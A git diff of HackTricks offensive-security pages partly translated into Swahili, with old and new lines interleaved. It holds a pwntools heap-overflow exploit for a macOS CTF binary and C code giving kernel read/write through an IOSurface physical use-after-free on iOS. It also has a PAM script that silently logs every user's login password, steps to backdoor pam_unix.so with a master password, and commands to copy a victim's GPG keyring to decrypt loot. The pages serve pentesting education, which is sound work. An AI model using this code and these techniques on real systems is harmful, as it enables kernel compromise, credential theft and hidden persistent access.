clang -O0 -Wall -Wextra -std=c11 -o heap_groom vuln.c
```
## Exploit
> [!WARNING]
> This exploit inaweka env variable `MallocNanoZone=0` ili kuzima NanoZone. Hii inahitajika kupata allocations zilizo karibu wakati wa kuita `malloc` kwa sizes ndogo. Bila hili, mallocs tofauti zitatengwa katika zones tofauti na hazitakuwa karibu; kwa hivyo overflow haitafanya kazi kama inavyotarajiwa.
```python
#!/usr/bin/env python3
# Heap overflow exploit for macOS ARM64 CTF challenge
#
# Vulnerability: Buffer overflow in heap-allocated buffer allows overwriting
# a function pointer in an adjacent heap chunk.
#
# Key insights:
# 1. macOS uses different heap zones for different allocation sizes
# 2. The NanoZone must be disabled (MallocNanoZone=0) to get predictable layout
# 3. With spacers allocated after main chunks, the distance is 560 bytes (432 padding needed)
#
from pwn import *
import re
import sys
import struct
import platform
# Detect architecture and set context accordingly
if platform.machine() == 'arm64' or platform.machine() == 'aarch64':
context.clear(arch='aarch64')
else:
context.clear(arch='amd64')
BIN = './heap_groom'
def parse_leak(line):
m = re.search(rb'win\(\) @ (0x[0-9a-fA-F]+)', line)
if not m:
log.failure("Couldn't parse leak")
sys.exit(1)
return int(m.group(1), 16)
def build_payload(win_addr, extra_pad=0):
# We want: [128 bytes padding] + [optional padding for heap metadata] + [overwrite cb pointer]
padding = b'A' * 128
if extra_pad:
padding += b'B' * extra_pad
# Add the win address to overwrite the function pointer
payload = padding + p64(win_addr)
return payload
def main():
# On macOS, we need to disable the Nano zone for adjacent allocations
import os
env = os.environ.copy()
env['MallocNanoZone'] = '0'
# The correct padding with MallocNanoZone=0 is 432 bytes
# This makes the total distance 560 bytes (128 buffer + 432 padding)
# Try the known working value first, then alternatives in case of heap variation
candidates = [
432, # 560 - 128 = 432 (correct padding with spacers and NanoZone=0)
424, # Try slightly less in case of alignment differences
440, # Try slightly more
416, # 16 bytes less
448, # 16 bytes more
0, # Direct adjacency (unlikely but worth trying)
]
log.info("Starting heap overflow exploit for macOS...")
for extra in candidates:
log.info(f"Trying extra_pad={extra} with MallocNanoZone=0")
p = process(BIN, env=env)
# Read leak line
leak_line = p.recvline()
win_addr = parse_leak(leak_line)
log.success(f"win() @ {hex(win_addr)}")
# Skip prompt lines
p.recvuntil(b"Enter payload length")
p.recvline()
# Build and send payload
payload = build_payload(win_addr, extra_pad=extra)
total_len = len(payload)
log.info(f"Sending {total_len} bytes (128 base + {extra} padding + 8 pointer)")
# Send length and payload
p.sendline(str(total_len).encode())
p.send(payload)
# Check if we overwrote the function pointer successfully
try:
output = p.recvuntil(b"Calling h->cb()", timeout=0.5)
p.recvline(timeout=0.5) # Skip the "..." part
# Check if we hit win()
response = p.recvline(timeout=0.5)
if b"win() reached" in response:
log.success(f"SUCCESS! Overwrote function pointer with extra_pad={extra}")
log.success("Shell spawned, entering interactive mode...")
p.interactive()
return
elif b"safe_cb() called" in response:
log.info(f"Failed with extra_pad={extra}, safe_cb was called")
else:
log.info(f"Failed with extra_pad={extra}, unexpected response")
except:
log.info(f"Failed with extra_pad={extra}, likely crashed")
p.close()
log.failure("All padding attempts failed. The heap layout might be different.")
log.info("Try running the exploit multiple times as heap layout can be probabilistic.")
if __name__ == '__main__':
main()
```
{{#include ../../banners/hacktricks-training.md}}

211
src/binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.md Normal file
View File

@ -0,0 +1,211 @@
# iOS Physical Use-After-Free via IOSurface
{{#include ../../banners/hacktricks-training.md}}
## Physical use-after-free
Hii ni muhtasari kutoka kwenye post ya [https://alfiecg.uk/2024/09/24/Kernel-exploit.html](https://alfiecg.uk/2024/09/24/Kernel-exploit.html). Taarifa zaidi kuhusu exploit inayotumia teknik hii inaweza kupatikana kwenye [https://github.com/felix-pb/kfd](https://github.com/felix-pb/kfd)
### Memory management in XNU <a href="#memory-management-in-xnu" id="memory-management-in-xnu"></a>
The **virtual memory address space** kwa michakato ya user kwenye iOS inajulikana kuanzia **0x0 hadi 0x8000000000**. Hata hivyo, anwani hizi hazitafsiri moja kwa moja kuwa physical memory. Badala yake, the **kernel** inatumia **page tables** kutafsiri anwani za virtual kuwa **physical addresses** halisi.
#### Levels of Page Tables in iOS
Page tables zimepangwa kwa hatua tatu:
1. **L1 Page Table (Level 1)**:
* Kila entry hapa inawakilisha eneo kubwa la virtual memory.
* Inafunika **0x1000000000 bytes** (au **256 GB**) ya virtual memory.
2. **L2 Page Table (Level 2)**:
* Entry hapa inawakilisha eneo ndogo zaidi la virtual memory, hasa **0x2000000 bytes** (32 MB).
* Entry ya L1 inaweza kuelekeza kwenye L2 table ikiwa haiwezi kuoanisha eneo lote yenyewe.
3. **L3 Page Table (Level 3)**:
* Hii ni level ya kina zaidi, ambapo kila entry inaoanisha ukurasa mmoja wa **4 KB**.
* Entry ya L2 inaweza kuelekeza kwenye L3 table ikiwa inahitaji udhibiti wa kina zaidi.
#### Mapping Virtual to Physical Memory
* **Direct Mapping (Block Mapping)**:
* Baadhi ya entry kwenye page table zinaoanisha moja kwa moja **msururu wa anwani za virtual** kwa msururu wa contiguous wa anwani za physical (kama njia mkato).
* **Pointer to Child Page Table**:
* Ikiwa inahitajika udhibiti wa kina, entry katika level moja (mfano L1) inaweza kuelekeza kwenye **child page table** kwenye level inayofuata (mfano L2).
#### Example: Mapping a Virtual Address
Tuseme unajaribu kufikia anwani ya virtual **0x1000000000**:
1. **L1 Table**:
* Kernel inakagua entry ya L1 inayohusiana na anwani hii ya virtual. Ikiwa ina **pointer to an L2 page table**, inahamia L2 table hiyo.
2. **L2 Table**:
* Kernel inakagua L2 page table kwa mapping ya kina zaidi. Ikiwa entry hii inaelekeza kwenye **L3 page table**, inaendelea huko.
3. **L3 Table**:
* Kernel inatafuta entry ya mwisho ya L3, ambayo inaelekeza kwenye **physical address** ya ukurasa wa kumbukumbu.
#### Example of Address Mapping
Ikiwa unaandika physical address **0x800004000** kwenye index ya kwanza ya L2 table, basi:
* Anwani za virtual kutoka **0x1000000000** hadi **0x1002000000** zinaoanisha kwa anwani za physical kutoka **0x800004000** hadi **0x802004000**.
* Hii ni **block mapping** kwenye level ya L2.
Akiba, ikiwa entry ya L2 inaelekeza kwenye L3 table:
* Kila ukurasa wa 4 KB kwenye anwani ya virtual **0x1000000000 -> 0x1002000000** utatafsiriwa na entry za kibinafsi katika L3 table.
### Physical use-after-free
Physical **use-after-free** (UAF) hutokea wakati:
1. Mchakato unafanya **allocate** memory fulani kama **readable na writable**.
2. **page tables** zinasasishwa ili kuoanisha memory hii na physical address maalum ambayo mchakato unaweza kufikia.
3. Mchakato una **deallocate** (free) memory hiyo.
4. Hata hivyo, kutokana na **bug**, kernel **inasahau kuondoa mapping** kutoka kwenye page tables, ingawa inaweka physical memory husika kama free.
5. Kernel inaweza kisha **kureallocate memory hii "freed"** kwa matumizi mengine, kama data ya kernel.
6. Kwa kuwa mapping haikuondolewa, mchakato bado anaweza **kusoma na kuandika** kwenye memory hiyo ya physical.
Hii inamaanisha mchakato unaweza kufikia **pages za kernel memory**, ambazo zinaweza kubeba data nyeti au miundo, na hivyo kumruhusu mwizi **kuathiri kernel memory**.
### IOSurface Heap Spray
Kwa kuwa mshambuliaji hana udhibiti wa kurudia ni kurasa gani za kernel zitapatiwa memory iliyofutwa, wanatumia tekniki inayoitwa **heap spray**:
1. Mshambuliaji **anaunda idadi kubwa ya IOSurface objects** katika kernel memory.
2. Kila IOSurface object ina **magic value** katika moja ya fields zake, kufanya iwe rahisi kuibua.
3. Wanapitia **pages zilizofutwa** kuona kama IOSurface objects yoyote imeangukia kwenye ukurasa uliotolewa.
4. Wao wanapogundua IOSurface object kwenye ukurasa uliofutwa, wanaweza kutumia ili **kusoma na kuandika kernel memory**.
Taarifa zaidi kuhusu hili ziko kwenye [https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups)
> [!TIP]
> Tambua kwamba vifaa vya iOS 16+ (A12+) vinamitigation za hardware (kama PPL au SPTM) zinazofanya physical UAF techniques kuwa ngumu zaidi. PPL inatekeleza ulinzi mgumu wa MMU kwenye kurasa zinazohusiana na code signing, entitlements, na data nyeti ya kernel, hivyo, hata ikiwa ukurasa utatumika tena, maandishi kutoka userland au code ya kernel iliyomilikiwa yanazuia kuandika kwenye kurasa zilizolindwa na PPL. Secure Page Table Monitor (SPTM) inaongeza PPL kwa kuimarisha sasisho za page table wenyewe. Inahakikisha kwamba hata code yenye mamlaka ya kernel haiwezi kubadilisha silently mappings au kupindua freed pages bila kupitia ukaguzi salama. KTRR (Kernel Text Read-Only Region), ambayo inalaza eneo la code ya kernel kama read-only baada ya boot. Hii inazuia mabadiliko ya runtime kwa code ya kernel, ikifunga njia kubwa ya shambulio ambayo physical UAF exploits mara nyingi hutegemea. Zaidi ya hayo, allocations za `IOSurface` zimekuwa zisizotarajiwa na ngumu zaidi kupangwa ndani ya maeneo yanayoweza kufikiwa na user, jambo linalofanya mbinu ya “magic value scanning” kuwa isiyokuwa na uhakika. Na `IOSurface` sasa inalindwa na entitlements na vizuizi vya sandbox.
### Step-by-Step Heap Spray Process
1. **Spray IOSurface Objects**: mshambuliaji anaunda IOSurface objects nyingi zilizo na kitambulisho maalum ("magic value").
2. **Scan Freed Pages**: wanakagua ikiwa yoyote ya objects imewekwa kwenye ukurasa uliotolewa.
3. **Read/Write Kernel Memory**: kwa kuathiri fields ndani ya IOSurface object, wanapata uwezo wa kufanya **arbitrary reads and writes** katika kernel memory. Hii inawawezesha:
* Kutumia field moja kusoma **kiasi chochote cha 32-bit** katika kernel memory.
* Kutumia field nyingine kuandika **64-bit values**, wakifikia primitive imara ya **kernel read/write**.
Generate IOSurface objects with the magic value IOSURFACE_MAGIC to later search for:
```c
void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) {
if (*nClients >= 0x4000) return;
for (int i = 0; i < nSurfaces; i++) {
fast_create_args_t args;
lock_result_t result;
size_t size = IOSurfaceLockResultSize;
args.address = 0;
args.alloc_size = *nClients + 1;
args.pixel_format = IOSURFACE_MAGIC;
IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size);
io_connect_t id = result.surface_id;
(*clients)[*nClients] = id;
*nClients = (*nClients) += 1;
}
}
```
Tafuta vitu vya **`IOSurface`** katika ukurasa mmoja wa kimwili uliotolewa:
```c
int iosurface_krw(io_connect_t client, uint64_t *puafPages, int nPages, uint64_t *self_task, uint64_t *puafPage) {
io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000);
int nSurfaceIDs = 0;
for (int i = 0; i < 0x400; i++) {
spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs);
for (int j = 0; j < nPages; j++) {
uint64_t start = puafPages[j];
uint64_t stop = start + (pages(1) / 16);
for (uint64_t k = start; k < stop; k += 8) {
if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) {
info.object = k;
info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1];
if (self_task) *self_task = iosurface_get_receiver(k);
goto sprayDone;
}
}
}
}
sprayDone:
for (int i = 0; i < nSurfaceIDs; i++) {
if (surfaceIDs[i] == info.surface) continue;
iosurface_release(client, surfaceIDs[i]);
}
free(surfaceIDs);
return 0;
}
```
### Kupata kusoma/kuandika kwa kernel kwa kutumia IOSurface
Baada ya kupata udhibiti wa objekti ya IOSurface katika kernel memory (imepangwa kwenye ukurasa wa kimwili uliotolewa unaopatikana kutoka userspace), tunaweza kuitumia kwa **operesheni zozote za kusoma na kuandika katika kernel**.
**Minda Muhimu katika IOSurface**
Objekti ya IOSurface ina vipengele viwili muhimu:
1. **Use Count Pointer**: Inaruhusu **kusoma kwa 32-bit**.
2. **Indexed Timestamp Pointer**: Inaruhusu **kuandika kwa 64-bit**.
Kwa kuandika upya pointers hizi, tunaziweka kuonyesha anwani zozote katika kernel memory, hivyo kuwezesha uwezo wa kusoma/kuandika.
#### Kusoma kwa 32-bit kwa kernel
Ili kufanya kusoma:
1. Bandika upya **use count pointer** ili ianze kuonyesha anwani lengwa ukiokoa offset ya 0x14-byte.
2. Tumia method `get_use_count` kusoma thamani kwenye anwani hiyo.
```c
uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) {
uint64_t args[1] = {surfaceID};
uint32_t size = 1;
uint64_t out = 0;
IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0);
return (uint32_t)out;
}
uint32_t iosurface_kread32(uint64_t addr) {
uint64_t orig = iosurface_get_use_count_pointer(info.object);
iosurface_set_use_count_pointer(info.object, addr - 0x14); // Offset by 0x14
uint32_t value = get_use_count(info.client, info.surface);
iosurface_set_use_count_pointer(info.object, orig);
return value;
}
```
#### 64-Bit Kernel Write
Ili kufanya uandishi:
1. Andika tena **indexed timestamp pointer** kwa anwani lengwa.
2. Tumia method ya `set_indexed_timestamp` kuandika thamani ya 64-bit.
```c
void set_indexed_timestamp(io_connect_t client, uint32_t surfaceID, uint64_t value) {
uint64_t args[3] = {surfaceID, 0, value};
IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0);
}
void iosurface_kwrite64(uint64_t addr, uint64_t value) {
uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object);
iosurface_set_indexed_timestamp_pointer(info.object, addr);
set_indexed_timestamp(info.client, info.surface, value);
iosurface_set_indexed_timestamp_pointer(info.object, orig);
}
```
#### Exploit Flow Recap
1. **Sababisha Physical Use-After-Free**: Kurasa zilizotolewa zinaweza kutumika tena.
2. **Spray IOSurface Objects**: Tenga vitu vingi vya IOSurface na "magic value" ya kipekee katika kernel memory.
3. **Identify Accessible IOSurface**: Tafuta IOSurface kwenye ukurasa uliotolewa unaodhibiti.
4. **Abuse Use-After-Free**: Badilisha pointers katika object ya IOSurface ili kuwezesha arbitrary **kernel read/write** kupitia IOSurface methods.
Kwa kutumia primitives hizi, the exploit hutoa controlled **32-bit reads** na **64-bit writes** kwa kernel memory. Hatua za ziada za jailbreak zinaweza kuhusisha primitives za read/write zenye utulivu zaidi, ambazo zinaweza kuhitaji kupitisha ulinzi wa ziada (mfano, PPL kwenye vifaa vipya vya arm64e).
{{#include ../../banners/hacktricks-training.md}}

49
src/linux-hardening/linux-post-exploitation/README.md
View File

@ -4,23 +4,23 @@
## Sniffing Logon Passwords with PAM
Wacha tuchague moduli ya PAM ili kurekodi kila password ambayo kila mtumiaji anaitumia kuingia. Ikiwa hujui PAM ni nini angalia:
Let's configure a PAM module to log each password each user uses to login. If you don't know what is PAM check:
{{#ref}}
pam-pluggable-authentication-modules.md
{{#endref}}
**For further details check the [original post](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)**. Hii ni muhtasari tu:
**Kwa maelezo zaidi angalia [chapisho la asili](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)**. Hii ni muhtasari tu:
**Technique Overview:**
Pluggable Authentication Modules (PAM) zinatoa unyumbufu katika kusimamia uthibitishaji kwenye mifumo ya Unix. Zinaboresha security kwa kuruhusu ubinafsishaji wa michakato ya login lakini pia zinaweza kuleta hatari endapo zitatumiwa vibaya. Muhtasari huu unaelezea technique ya kukamata login credentials kwa kutumia PAM, pamoja na mitigation strategies.
**Muhtasari wa Mbinu:**
Pluggable Authentication Modules (PAM) zinatoa unyumbufu katika kusimamia uthibitishaji kwenye mifumo inayotegemea Unix. Zinaweza kuboresha usalama kwa kubadilisha mchakato wa kuingia, lakini pia zinaweza kuleta hatari ikiwa zitatumika vibaya. Muhtasari huu unaelezea mbinu ya kukamata cheti za kuingia kwa kutumia PAM, pamoja na mikakati ya kupunguza hatari.
**Capturing Credentials:**
**Kukamata cheti za kuingia:**
- Script ya bash yenye jina `toomanysecrets.sh` imeandikwa ili kurekodi jaribio za login, ikichukua tarehe, jina la mtumiaji (`$PAM_USER`), password (kupitia stdin), na IP ya host ya mbali (`$PAM_RHOST`) katika `/var/log/toomanysecrets.log`.
- Script imefanywa executable na kuingizwa katika configuration ya PAM (`common-auth`) kwa kutumia module `pam_exec.so` na chaguzi za kuendesha kimya na kufikisha authentication token kwa script.
- Mbinu hii inaonyesha jinsi host ya Linux iliyovamiwa inaweza kutumika kurekodi credentials kwa utulivu.
- Skripti ya bash iitwayo `toomanysecrets.sh` imeandaliwa ili kurekodi jaribio za kuingia, ikikusanya tarehe, jina la mtumiaji (`$PAM_USER`), nenosiri (kupitia stdin), na anwani ya IP ya mwenyeji wa mbali (`$PAM_RHOST`) katika `/var/log/toomanysecrets.log`.
- Skripti hiyo inafanywa iwe executable na kuingizwa kwenye usanidi wa PAM (`common-auth`) kwa kutumia moduli `pam_exec.so` na chaguo za kuendesha kwa kimya na kumfichulia skripti tokeni ya uthibitishaji.
- Njia hii inaonyesha jinsi mwenyeji wa Linux aliyevunjwa usalama anaweza kutumika kurekodi cheti za kuingia kwa siri.
```bash
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
@ -34,31 +34,30 @@ sudo chmod 700 /usr/local/bin/toomanysecrets.sh
**Kwa maelezo zaidi angalia [original post](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)**. Hii ni muhtasari tu:
Pluggable Authentication Module (PAM) ni mfumo unaotumika chini ya Linux kwa uthibitishaji wa watumiaji. Inaendeshwa kwa misingi mitatu kuu: **username**, **password**, na **service**. Faili za usanidi kwa kila service ziko kwenye saraka `/etc/pam.d/`, ambapo maktaba za pamoja hushughulikia uthibitishaji.
Pluggable Authentication Module (PAM) ni mfumo unaotumika kwenye Linux kwa uthibitishaji wa watumiaji. Inafanya kazi kwa msingi wa dhana tatu kuu: **username**, **password**, na **service**. Faili za usanidi za kila service ziko kwenye saraka ya `/etc/pam.d/`, ambapo maktaba zilizoshirikiwa (shared libraries) zinashughulikia uthibitishaji.
**Lengo**: Badilisha PAM ili kuruhusu uthibitishaji kwa kutumia password maalum, ukiepuka password halisi ya mtumiaji. Hii inazingatia hasa maktaba ya pamoja `pam_unix.so` inayotumika na faili `common-auth`, ambayo imejumuishwa na karibu services zote kwa password verification.
**Lengo**: Badilisha PAM ili kuruhusu uthibitishaji kwa password maalum, ukiepuka password halisi ya mtumiaji. Hii inalenga hasa maktaba ya shared `pam_unix.so` inayotumiwa na faili ya `common-auth`, ambayo imejumuishwa na karibu kila service kwa uhakiki wa password.
### Steps for Modifying `pam_unix.so`:
1. **Locate the Authentication Directive** in the `common-auth` file:
- Mstari unaowajibika kwa kuangalia password ya mtumiaji unaitisha `pam_unix.so`.
2. **Modify Source Code**:
- Ongeza tamko la upendeleo (conditional) kwenye faili la chanzo `pam_unix_auth.c` ambalo linampa ufikiaji ikiwa password iliyowekwa mapema imetumika, vinginevyo linaendelea na mchakato wa kawaida wa authentication.
3. **Recompile and Replace** the modified `pam_unix.so` library in the appropriate directory.
- Recompile na ubadilishe maktaba `pam_unix.so` iliyorekebishwa kwenye saraka husika.
4. **Testing**:
- Ufikiaji unatolewa kwa services mbalimbali (login, ssh, sudo, su, screensaver) kwa kutumia password iliyotangazwa kabla, wakati michakato ya kawaida ya authentication haidhuriwa.
1. **Pata Directive ya Uthibitishaji** katika faili ya `common-auth`:
- Mstari unaohusika na kuangalia password ya mtumiaji unaita `pam_unix.so`.
2. **Badilisha Source Code**:
- Ongeza kauli ya masharti (conditional) katika faili ya chanzo `pam_unix_auth.c` ambayo inatoa ruhusa ikiwa password iliyowekwa mapema imetumika, vinginevyo inaendelea na mchakato wa uthibitishaji wa kawaida.
3. **Recompile and Replace** maktaba iliyorekebishwa `pam_unix.so` katika saraka inayofaa.
4. **Kupima**:
- Ruhusa inatolewa katika huduma mbalimbali (login, ssh, sudo, su, screensaver) kwa password iliyotangazwa, wakati michakato ya kawaida ya uthibitishaji haijathiriwa.
> [!TIP]
> Unaweza kuendesha mchakato huu kwa kiotomatiki kwa kutumia [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)
> Unaweza kuendesha kiotomatiki mchakato huu na [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)
## Decrypting GPG loot via homedir relocation
## Kudekripti faili za GPG kwa kuhamisha homedir
If you find an encrypted `.gpg` file and a users `~/.gnupg` folder (pubring, private-keys, trustdb) but you cant decrypt due to GnuPG homedir permissions/locks, copy the keyring to a writable location and use it as your GPG home.
Ikiwa unatambua faili iliyofichwa `.gpg` na saraka ya mtumiaji `~/.gnupg` (pubring, private-keys, trustdb) lakini huwezi kudekripti kutokana na ruhusa/mifungo ya homedir ya GnuPG, nakili keyring hadi mahali pa kuandikika na uitumie kama GPG home yako.
Makosa ya kawaida utakayoyaona bila hili: "unsafe ownership on homedir", "failed to create temporary file", or "decryption failed: No secret key" (kwa sababu GPG haiwezi kusoma/kuandika homedir ya asili).
Marejesho ya kawaida utakayoyaona bila hii: "unsafe ownership on homedir", "failed to create temporary file", au "decryption failed: No secret key" (kwa sababu GPG haiwezi kusoma/kuandika homedir ya asili).
Workflow:
Mtiririko wa kazi:
```bash
# 1) Stage a writable homedir and copy the victim's keyring
mkdir -p /dev/shm/fakehome/.gnupg
@ -71,10 +70,10 @@ GNUPGHOME=/dev/shm/fakehome/.gnupg gpg -d /home/victim/backup/secrets.gpg
# or
gpg --homedir /dev/shm/fakehome/.gnupg -d /home/victim/backup/secrets.gpg
```
Ikiwa nyenzo za ufunguo wa siri zipo katika `private-keys-v1.d`, GPG itafungua na ku-decrypt bila kuuliza passphrase (au itauliza ikiwa ufunguo umewekwa ulinzi).
Iwapo nyenzo za siri za ufunguo zipo katika `private-keys-v1.d`, GPG itafungua na ku-decrypt bila kuomba passphrase (au itaomba ikiwa ufunguo umehifadhiwa kwa ulinzi).
## Marejeo
## References
- [0xdf HTB Environment (GPG homedir relocation to decrypt loot)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
- [GnuPG Manual Home directory and GNUPGHOME](https://www.gnupg.org/documentation/manuals/gnupg/GPG-Configuration-Options.html#index-homedir)

597
src/linux-hardening/privilege-escalation/README.md
View File

File diff suppressed because it is too large Load Diff

497
src/mobile-pentesting/android-app-pentesting/README.md
View File

@ -1,10 +1,10 @@
# Kupima Usalama wa Programu za Android Pentesting
# Programu za Android Pentesting
{{#include ../../banners/hacktricks-training.md}}
## Misingi ya Programu za Android
It's highly recommended to start reading this page to know about the **most important parts related to Android security and the most dangerous components in an Android application**:
Inashauriwa sana kuanza kusoma ukurasa huu ili kujua kuhusu **vipengele muhimu zaidi vinavyohusiana na usalama wa Android na vipengele hatari zaidi katika programu ya Android**:
{{#ref}}
@ -13,24 +13,24 @@ android-applications-basics.md
## ADB (Android Debug Bridge)
This is the main tool you need to connect to an android device (emulated or physical).\
**ADB** allows to control devices either over **USB** or **Network** from a computer. This utility enables the **copying** of files in both directions, **installation** and **uninstallation** of apps, **execution** of shell commands, **backing up** of data, **reading** of logs, among other functions.
Hii ni zana kuu unayohitaji kuunganishwa na kifaa cha Android (imeigwa au halisi).\
**ADB** inaruhusu kudhibiti vifaa kwa njia ya **USB** au kupitia **Network** kutoka kwa kompyuta. Kifaa hiki kinawezesha **kunakili** faili kwa pande zote, **kufunga** na **kuondoa** apps, **kuendesha** amri za shell, **kufanya backup** ya data, **kusoma** logs, miongoni mwa kazi nyingine.
Take a look to the following list of [**ADB Commands**](adb-commands.md) to learn how to use adb.
Tazama orodha ifuatayo ya [**ADB Commands**](adb-commands.md) ili ujifunze jinsi ya kutumia adb.
## Smali
Sometimes it is interesting to **modify the application code** to access **hidden information** (maybe well obfuscated passwords or flags). Then, it could be interesting to decompile the apk, modify the code and recompile it.\
[**In this tutorial** you can **learn how to decompile and APK, modify Smali code and recompile the APK** with the new functionality](smali-changes.md). This could be very useful as an **alternative for several tests during the dynamic analysis** that are going to presented. Then, **keep always in mid this possibility**.
Wakati mwingine ni muhimu **kubadilisha msimbo wa programu** ili kufikia **taarifa zilizofichwa** (labda nywila zilizofichwa vizuri au flags). Kisha, inaweza kuwa ya manufaa ku-decompile APK, kubadilisha msimbo na ku-recompile tena.\
[**In this tutorial** you can **learn how to decompile and APK, modify Smali code and recompile the APK** with the new functionality](smali-changes.md). Hii inaweza kuwa muhimu kama **mbadala kwa vipimo kadhaa wakati wa dynamic analysis** zitakazowasilishwa. Kwa hiyo, **kumbuka daima uwezekano huu**.
## Other interesting tricks
## Mbinu nyingine za kuvutia
- [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md)
- [Shizuku Privileged API (ADB-based non-root privileged access)](shizuku-privileged-api.md)
- [Exploiting Insecure In-App Update Mechanisms](insecure-in-app-update-rce.md)
- [Abusing Accessibility Services (Android RAT)](accessibility-services-abuse.md)
- **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd)
- Extract APK from device:
- Chomoa APK kutoka kwenye kifaa:
```bash
adb shell pm list packages
com.android.insecurebankv2
@ -49,7 +49,7 @@ java -jar ../APKEditor.jar m -i splits/ -o merged.apk
# after merging, you will need to align and sign the apk, personally, I like to use the uberapksigner
java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
```
## Masomo ya Kesi & Vulnerabilities
## Masomo ya Kesi & Udhaifu
{{#ref}}
@ -61,41 +61,41 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
../../linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
{{#endref}}
## Static Analysis
## Uchambuzi wa Statiki
Kwanza kabisa, kwa kuchambua APK unapaswa **take a look to the to the Java code** using a decompiler.\
Please, [**read here to find information about different available decompilers**](apk-decompilers.md).
Kwanza kabisa, kwa kuchambua APK unapaswa **kutazama Java code** kwa kutumia decompiler.\
Tafadhali, [**soma hapa kupata taarifa kuhusu decompilers tofauti zilizopo**](apk-decompilers.md).
### Kutafuta Taarifa Zinazovutia
Kwa kuangalia tu **strings** za APK unaweza kutafuta **passwords**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api** keys, **encryption**, **bluetooth uuids**, **tokens** na chochote kinachovutia... angalia hata kwa code execution **backdoors** au authentication backdoors (hardcoded admin credentials to the app).
Kwa kuangalia tu **strings** za APK unaweza kutafuta **passwords**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api** keys, **encryption**, **bluetooth uuids**, **tokens** na chochote kinachovutia... hata tazama kwa ajili ya code execution **backdoors** au authentication backdoors (hardcoded admin credentials kwa app).
**Firebase**
Lipa umakini maalum kwa **firebase URLs** na angalia kama zimesanidiwa vibaya. [More information about whats is FIrebase and how to exploit it here.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
Lipa makini kwa **firebase URLs** na angalia kama imewekwa vibaya. [Taarifa zaidi kuhusu ni nini Firebase na jinsi ya exploit hapa.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
### Basic understanding of the application - Manifest.xml, strings.xml
### Uelewa wa msingi wa application - Manifest.xml, strings.xml
Uchunguzi wa faili za programu _Manifest.xml_ na _strings.xml_ unaweza kufichua potential security vulnerabilities. Faili hizi zinaweza kupatikana ukitumia decompilers au kwa kubadilisha extension ya faili ya APK kuwa .zip na kisha kuzifungua.
Uchunguzi wa faili za programu _Manifest.xml_ na **_strings.xml_** unaweza kufumbua udhaifu wa usalama. Faili hizi zinaweza kupatikana kwa kutumia decompilers au kwa kubadilisha extension ya faili APK kuwa .zip kisha kuizipua.
Vulnerabilities zilizobainika kutoka Manifest.xml ni pamoja na:
**Udahifu** unaotambulika kutoka **Manifest.xml** ni pamoja na:
- **Debuggable Applications**: Applications zilizowekwa kama debuggable (`debuggable="true"`) katika faili ya _Manifest.xml_ zina hatari kwa kuwa zinaruhusu connections ambazo zinaweza kusababisha exploitation. Kwa ufahamu zaidi juu ya jinsi ya ku-exploit debuggable applications, rejea tutorial kuhusu kupata na ku-exploit debuggable applications kwenye kifaa.
- **Backup Settings**: Kigezo `android:allowBackup="false"` kinapaswa kuwekwa wazi kwa applications zinazoendesha taarifa nyeti ili kuzuia unauthorized data backups kupitia adb, hasa wakati usb debugging iko enabled.
- **Network Security**: Custom network security configurations (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ zinaweza kubainisha maelezo ya usalama kama certificate pins na mipangilio ya HTTP traffic. Mfano ni kuruhusu HTTP traffic kwa domains maalum.
- **Exported Activities and Services**: Kutambua exported activities na services katika manifest kunaweza kuonyesha components ambazo zinaweza kutumika vibaya. Uchambuzi zaidi wakati wa dynamic testing unaweza kufichua jinsi ya ku-exploit components hizi.
- **Content Providers and FileProviders**: Content providers zilizo wazi zinaweza kuruhusu access au modification ya data bila idhini. Sanidiwa nzuri ya FileProviders inapaswa pia kuchunguzwa.
- **Broadcast Receivers and URL Schemes**: Components hizi zinaweza kutumika kwa exploitation, ukizingatia jinsi URL schemes zinavyosimamiwa kwa matatizo ya input.
- **SDK Versions**: Atributi `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha toleo la Android linaloungwa mkono, zikibainisha umuhimu wa kuto-support matoleo ya zamani na yalio na vulnerabilities kwa sababu za usalama.
